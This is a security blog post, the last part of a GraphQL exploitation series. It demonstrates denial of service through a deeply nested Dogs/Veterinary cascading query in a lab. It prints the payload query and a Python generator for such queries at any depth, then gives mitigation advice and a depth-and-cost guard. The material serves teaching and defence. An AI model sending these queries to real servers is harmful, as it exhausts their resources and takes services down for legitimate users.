We have finally reached the last part of the GraphQL exploitation series. If you are visiting this blog without having gone through the previous parts, we recommend reading those first.
In this blog, we will go through another possible vulnerability on a GraphQL server: resource exhaustion, i.e. denial of service. Because the client controls how much data a query requests and how deeply it is nested, it can issue a request that exhausts resources on the storage backend used by the GraphQL server (the database that has to answer every cascading lookup) as well as on the GraphQL server itself, which has to resolve every field and serialise the result to JSON.
This vulnerability does not only affect query operations; it can also be triggered through mutation and subscription operations. When a large amount of data is sent in the arguments of a mutation, the server burns CPU at its end validating and processing it. Registering a large number of subscribers, or sending large arguments through a subscription, can likewise drive CPU utilisation up on the server.
To demonstrate this, we will use the same lab as in the previous parts.
In this application a Dog is linked to its Veterinary and a Veterinary is linked back to its Dogs, so a query can follow the relation back and forth indefinitely. Each hop is resolved with further lookups, which makes cascading calls possible and can exhaust resources at the SQL level on the database.
Let's formulate a big cascading query like this one.
```graphql
query dos {
  allDogs(onlyFree: false, limit: 1000000) {
    id
    name
    veterinary {
      id
      name
      dogs {
        id
        name
        veterinary {
          id
          name
          dogs {
            id
            name
            veterinary {
              id
              name
              dogs {
                id
                name
                veterinary {
                  id
                  name
                  dogs {
                    id
                    name
                    veterinary {
                      id
                      name
                      dogs {
                        id
                        name
                      }
                    }
                  }
                }
              }
            }
          }
        }
      }
    }
  }
}
```
When we send this query to the server, the server's CPU utilisation climbs to almost 100%.
Remember that to exploit a query operation this way, you must find a relation between two elements of the database schema that can be traversed in both directions, as Dogs and Veterinary are here: without the cycle there is nothing to nest.
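The query above is one fixed instance with ten relation hops. As an added example that is not part of the original post or the lab, the following Python script generates the same Dogs/Veterinary cascade at any depth, so the effect of nesting on server load can be compared between depths instead of editing the query by hand. Field and argument names (allDogs, onlyFree, limit, veterinary, dogs, id, name) are taken from the query shown above; the endpoint URL passed to send_query is an assumption.

```python
# Added example (not from the post or the lab): generate the cascading
# Dogs <-> Veterinary query at any depth so server load can be measured
# per depth. Field and argument names follow the query shown in the post;
# the endpoint URL given to send_query is an assumption.
import json
import urllib.request


def build_cascading_query(hops: int, limit: int = 1000000) -> str:
    """Return a query that alternates veterinary -> dogs -> veterinary ... below allDogs.

    hops is the number of relation traversals; hops=0 yields only allDogs { id name }.
    """
    relations = ("veterinary", "dogs")
    body = "id name"
    # Build from the innermost selection outward so the first hop is veterinary.
    for i in reversed(range(hops)):
        body = f"id name {relations[i % 2]} {{ {body} }}"
    return f"query dos {{ allDogs(onlyFree: false, limit: {limit}) {{ {body} }} }}"


def nesting_depth(query: str) -> int:
    """Maximum selection-set nesting measured by brace counting.

    The operation and allDogs braces count too, so the post's query scores 12.
    """
    depth = current = 0
    for ch in query:
        if ch == "{":
            current += 1
            depth = max(depth, current)
        elif ch == "}":
            current -= 1
    return depth


def send_query(url: str, query: str, timeout: float = 30.0) -> dict:
    """POST the query as JSON to a GraphQL endpoint. Only run this against a lab you own."""
    payload = json.dumps({"query": query}).encode()
    req = urllib.request.Request(
        url, data=payload, headers={"Content-Type": "application/json"}
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.loads(resp.read())


if __name__ == "__main__":
    # 10 hops reproduces the query from the post; raise it to see how CPU time
    # grows with depth. The endpoint below is a constructed placeholder.
    for hops in (2, 5, 10):
        q = build_cascading_query(hops)
        print(f"{hops} hops, brace depth {nesting_depth(q)}, {len(q)} bytes")
    # send_query("http://localhost:8080/graphql", build_cascading_query(10))
```

The payload size stays tiny (a few hundred bytes) no matter how deep the query goes, which is why request-size limits alone do not help against this attack.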
Mitigation
For Query
GraphQL developers need to know the defensive strategies that prevent this kind of abuse for every operation type. For queries, use the built-in protection for maximum query depth and query complexity (cost analysis) offered by the GraphQL server implementation in use. A depth limit rejects the cascading query above during validation, before any resolver or database call runs; a complexity limit additionally catches shallow queries that ask for enormous lists through arguments such as limit.
For Mutation/Subscription:
- Use input validation to limit the size of the incoming data that is accepted (for example, a maximum length on string and list arguments).
- Limit the number of subscribers, i.e. active subscriptions, at the code level.
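To make the depth and complexity limits above concrete, here is an added example (not code from the post or from the lab) of a pre-execution guard that rejects a document when its selection-set depth or estimated cost exceeds a budget. The tokenizer only understands the syntax subset used in this post (no fragments, variables, directives or list values) and rejects anything else; a real server should rely on its library's validation rules, such as graphql-depth-limit and graphql-query-complexity for graphql-js, rather than on a hand-rolled parser. The set of list fields, the default list size of 10 rows and the budgets are assumptions for the lab.

```python
# Added example (not from the post or the lab): reject a GraphQL document
# before execution when its nesting depth or estimated cost exceeds a budget.
# Only the syntax subset used in the post is parsed; anything else is rejected.
# LIST_FIELDS, DEFAULT_LIST_SIZE and the budgets are assumptions for the lab.
import re

LIST_FIELDS = {"allDogs", "dogs"}   # fields that return a list in the lab schema
DEFAULT_LIST_SIZE = 10              # assumed rows when no limit argument is given
TOKEN_RE = re.compile(
    r'\s+|#[^\n]*'                                    # whitespace and comments
    r'|(?P<tok>[_A-Za-z][_0-9A-Za-z]*'                # names
    r'|-?\d+(?:\.\d+)?|"(?:[^"\\]|\\.)*"'             # numbers and strings
    r'|[{}():,])'                                     # punctuation
    r'|(?P<bad>.)',                                   # anything else is rejected
    re.S,
)


class QueryRejected(Exception):
    pass


def tokenize(query: str) -> list:
    tokens = []
    for m in TOKEN_RE.finditer(query):
        if m.group("tok") is not None:
            tokens.append(m.group("tok"))
        elif m.group("bad") is not None:
            raise QueryRejected(f"unsupported syntax {m.group('bad')!r} at offset {m.start()}")
    return tokens


def _parse_selection_set(tokens, i, depth, rows, stats):
    # Parse tokens[i] == '{' up to its matching '}' and return the index after it.
    # rows is the estimated number of parent objects this set is resolved for,
    # so every field inside it costs `rows` resolver calls.
    if tokens[i] != "{":
        raise QueryRejected("expected '{'")
    i += 1
    stats["max_depth"] = max(stats["max_depth"], depth)
    while tokens[i] != "}":
        name = tokens[i]
        i += 1
        if tokens[i] == ":":                # alias: field
            name = tokens[i + 1]
            i += 2
        if not name.isidentifier():
            raise QueryRejected(f"expected a field name, got {name!r}")
        limit = None
        if tokens[i] == "(":                # arguments; only `limit` affects the cost model
            i += 1
            while tokens[i] != ")":
                arg, colon, value = tokens[i], tokens[i + 1], tokens[i + 2]
                if colon != ":":
                    raise QueryRejected(f"malformed argument {arg!r}")
                if arg == "limit" and value.lstrip("-").isdigit():
                    limit = max(int(value), 0)
                i += 3
                if tokens[i] == ",":
                    i += 1
            i += 1
        stats["cost"] += rows
        if tokens[i] == "{":                # sub-selection: list fields multiply the rows
            child_rows = rows
            if name in LIST_FIELDS:
                child_rows *= limit if limit is not None else DEFAULT_LIST_SIZE
            i = _parse_selection_set(tokens, i, depth + 1, child_rows, stats)
    return i + 1


def analyse_query(query: str) -> dict:
    """Return the maximum selection depth and estimated cost of a query or mutation."""
    tokens = tokenize(query)
    if "{" not in tokens:
        raise QueryRejected("no selection set")
    stats = {"max_depth": 0, "cost": 0}
    try:
        _parse_selection_set(tokens, tokens.index("{"), 0, 1, stats)
    except IndexError:
        raise QueryRejected("unterminated document") from None
    return stats


def guard(query: str, max_depth: int = 5, max_cost: int = 100_000) -> dict:
    """Raise QueryRejected if the document exceeds the depth or cost budget."""
    stats = analyse_query(query)
    if stats["max_depth"] > max_depth:
        raise QueryRejected(f"depth {stats['max_depth']} exceeds {max_depth}")
    if stats["cost"] > max_cost:
        raise QueryRejected(f"estimated cost {stats['cost']} exceeds {max_cost}")
    return stats


# Constructed inputs: a legitimate request and a five-level cut of the post's
# cascading query, keeping its limit of 1000000.
SMALL_QUERY = "{ allDogs(limit: 3) { id name veterinary { id } } }"
DEEP_QUERY = ("query dos { allDogs(onlyFree: false, limit: 1000000) { id name "
              "veterinary { id name dogs { id name veterinary { id name dogs { id name } } } } } }")
```

Run against the constructed inputs, SMALL_QUERY passes with an estimated cost of 13, while DEEP_QUERY stays within the depth budget of 5 yet is rejected on cost (266,000,001 estimated resolver calls), which is why both checks belong together: depth alone lets a flat query with limit: 1000000 through, and cost alone can be fooled on fields whose list size is unknown.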
About Payatu
Payatu is a Research Focused, CERT-In impaneled Cybersecurity Consulting company specializing in security assessments of IoT product ecosystem, Web application & Network with a proven track record of securing applications and infrastructure for customers across 20+ countries.